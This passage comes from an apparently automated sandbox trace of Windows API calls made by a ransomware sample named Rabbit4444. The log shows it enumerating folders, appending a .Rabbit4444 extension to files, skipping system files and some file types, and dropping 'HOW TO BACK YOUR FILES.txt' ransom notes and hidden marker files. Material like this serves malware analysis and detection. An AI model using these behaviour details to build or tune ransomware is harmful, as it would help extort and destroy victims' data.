(HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x122f98 [0062.688] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0062.688] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122f98 | out: hHeap=0xe0000) returned 1 [0062.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0062.689] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15399932537) returned 1 [0062.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0062.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0062.689] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.689] CloseHandle (hObject=0x260) returned 1 [0062.689] CloseHandle (hObject=0x27c) returned 1 [0062.689] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444") returned 113 [0062.689] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0062.690] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x87e78d6e, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x87e78d6e, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0x87e78d6e, ftLastWriteTime.dwHighDateTime=0x1d32716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0062.690] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.690] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.690] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0062.690] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0062.690] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0062.690] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0062.690] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0062.690] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0062.690] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0062.690] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0062.690] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0062.690] lstrcpyW (in: lpString1=0x130ebe2, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0062.690] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0062.692] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0062.692] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0062.692] lstrlenW (lpString="Rabbit4444") returned 10 [0062.692] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0062.692] lstrlenW (lpString=".dll") returned 4 [0062.692] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0062.692] lstrlenW (lpString=".lnk") returned 4 [0062.692] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0062.692] lstrlenW (lpString=".ini") returned 4 [0062.692] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0062.692] lstrlenW (lpString=".sys") returned 4 [0062.692] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0062.692] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x87e78d6e, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x87e78d6e, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0x87e78d6e, ftLastWriteTime.dwHighDateTime=0x1d32716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0062.692] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0062.692] lstrcpyW (in: lpString1=0x130ebe2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.692] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.694] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0062.694] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.695] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.695] CloseHandle (hObject=0x27c) returned 1 [0062.695] CloseHandle (hObject=0x298) returned 1 [0062.695] GetCurrentThreadId () returned 0xd98 [0062.695] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0062.695] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState" [0062.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122758 | out: hHeap=0xe0000) returned 1 [0062.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0062.695] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState" [0062.695] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState\\" [0062.695] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0062.695] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.698] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.701] FlushFileBuffers (hFile=0x298) returned 1 [0062.702] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.702] CloseHandle (hObject=0x298) returned 1 [0062.702] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState") returned 88 [0062.702] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.702] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4097064, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1f8706e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeeb182f8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0062.703] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.703] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.703] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.703] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.703] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4097064, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1f8706e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeeb182f8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.703] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.703] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.703] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.703] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.703] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.703] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeb182f8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeb182f8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeb182f8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.703] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.703] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.703] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeb182f8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeb182f8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeb182f8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.703] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0062.703] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.703] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.703] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0062.704] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.704] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.704] CloseHandle (hObject=0x27c) returned 1 [0062.704] CloseHandle (hObject=0x298) returned 1 [0062.704] GetCurrentThreadId () returned 0xd98 [0062.704] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220c8 [0062.704] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState" [0062.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124028 | out: hHeap=0xe0000) returned 1 [0062.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0062.704] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState" [0062.704] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState\\" [0062.704] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0062.704] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.705] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.708] FlushFileBuffers (hFile=0x298) returned 1 [0062.709] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.709] CloseHandle (hObject=0x298) returned 1 [0062.709] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState") returned 86 [0062.709] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.709] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4097064, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1f86969, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeeb3e56d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0062.710] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.710] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.710] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.710] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.710] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4097064, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1f86969, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeeb3e56d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.710] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.710] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.710] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.710] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.710] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.710] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeb3e56d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeb3e56d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeb3e56d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.710] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.710] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.710] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeb3e56d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeb3e56d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeb3e56d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.710] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0062.710] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.710] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.711] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0062.711] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.711] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.711] CloseHandle (hObject=0x27c) returned 1 [0062.711] CloseHandle (hObject=0x298) returned 1 [0062.711] GetCurrentThreadId () returned 0xd98 [0062.711] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0062.711] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache" [0062.711] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1243c0 | out: hHeap=0xe0000) returned 1 [0062.712] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0062.712] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache" [0062.712] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\" [0062.712] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0062.712] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.714] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.717] FlushFileBuffers (hFile=0x298) returned 1 [0062.718] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.718] CloseHandle (hObject=0x298) returned 1 [0062.719] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache") returned 86 [0062.719] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.719] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40bd2b0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xda90ec4a, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xeeb3e56d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0062.719] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.719] lstrcmpiW (lpString1=".", 